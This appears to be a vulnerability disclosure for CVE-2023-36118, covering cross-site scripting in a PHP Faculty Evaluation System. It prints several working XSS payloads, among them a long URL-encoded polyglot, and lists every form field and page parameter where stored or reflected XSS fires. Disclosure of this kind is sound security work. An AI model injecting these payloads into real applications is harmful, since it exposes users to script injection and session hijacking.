Headline
CVE-2023-36118: Faculty Evaluation System - HackMD
Cross Site Scripting vulnerability in Faculty Evaulation System using PHP/MySQLi v.1.0 allows an attacker to execute arbitrary code via a crafted payload to the page parameter.
# Faculty Evaluation System  After pressing Set for each option  stored xss Entering the payload in the bottom box of most projects will trigger -> I will write the details of the affected part at the end [xss payload](https://github.com/payloadbox/xss-payload-list/blob/master/Intruder/xss-payload-list.txt) ``` <script>alert(1)</script> <img src=1 onerror=alert(1)> <iframe src=javascript:alert(1)> … ```      More interesting is this payload ``` xss%20%22%3E%3E%3Cmarquee%3E%3Cimg%20src=x%20onerror=confirm(/OPENBUGBOUNTY/)%3E%3C/marquee%3E%22%20%3E%3C/plaintext\%3E%3C/|\%3E%3Cplaintext/onmouseover=prompt(/OPENBUGBOUNTY/)%20%3E%3Cscript%3Eprompt(/OPENBUGBOUNTY/)%3C/script%[email protected]%3Cisindex%20formaction=javascript:alert(1)%20type=submit%3E%27–%3E%22%20%3E%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E%22%3E%3Cimg/id=%22confirm(%20OPENBUGBOUNTY)%22/alt=%22/%22src=%22/%22onerror=eval(id&%23x29;%3E%27%22%3E%3Cimg%20src=%22http:%20www.openbugbounty.org/images/design/openbugbounty-logo.png%22%3E%20%EF%BF%BC&show;=xss%20%22%3E%3E%3Cmarquee%3E%3Cimg%20src=x%20onerror=confirm(/OPENBUGBOUNTY/)%3E%3C/marquee%3E%22%20%3E%3C/plaintext\%3E%3C/|\%3E%3Cplaintext/onmouseover=prompt(/OPENBUGBOUNTY/)%20%3E%3Cscript%3Eprompt(/OPENBUGBOUNTY/)%3C/script%[email protected]%3Cisindex%20formaction=javascript:alert(1)%20type=submit%3E%27–%3E%22%20%3E%3C/script%3E%3Cscript%3Ealert(1)%3C/s ```  Stored xss will cause xss is triggered every time the page is visited Affected vulnerable blocks: ``` On the page http://localhost/eval/, under “Manage Account,” if an XSS payload is entered in the “First Name” and “Last Name” fields, it can trigger stored XSS. On the page http://localhost/eval/index.php?page=, after entering a reflected XSS payload in the “page=” parameter, it can trigger an attack. On the page http://localhost/eval/index.php?page=subject_list, under the “Manage subject” setting in the “Action” section, if an XSS payload is entered in the “Description” and “Subject” fields, it can trigger stored XSS. On the page http://localhost/eval/index.php?page=class_list, under the “Manage class” setting in the “Action” section, if an XSS payload is entered in any of the fields, it can trigger stored XSS. On the page http://localhost/eval/index.php?page=academic_list, under the “Manage” setting in the “Action” section, if an XSS payload is entered in the “Year” field, it can trigger stored XSS. On the page http://localhost/eval/index.php?page=questionnaire, under the “Manage” setting in the “Action” section, in the “Question” field at the bottom of the page, if an XSS payload is entered, it can trigger stored XSS. On the page http://localhost/eval/index.php?page=criteria_list, in the “Criteria” field, if an XSS payload is entered, it can trigger stored XSS. On any page under http://localhost/eval/index.php?page=faculty_list, after clicking “Edit” in the “Action” column, on the page http://localhost/eval/index.php?page=edit_faculty&id=, under the “Edit Faculty” section, if an XSS payload is entered in the “School ID,” “First Name,” and “Last Name” fields, it can trigger stored XSS. On any page under http://localhost/eval/index.php?page=student_list, after clicking “Edit” in the “Action” column, on the respective page, in the “School ID,” “First Name,” and “Last Name” fields, if an XSS payload is entered, it can trigger stored XSS. On any page under http://localhost/eval/index.php?page=user_list, after clicking “Edit” in the “Action” column, on the respective page, in the “First Name” and “Last Name” fields, if an XSS payload is entered, it can trigger stored XSS. ```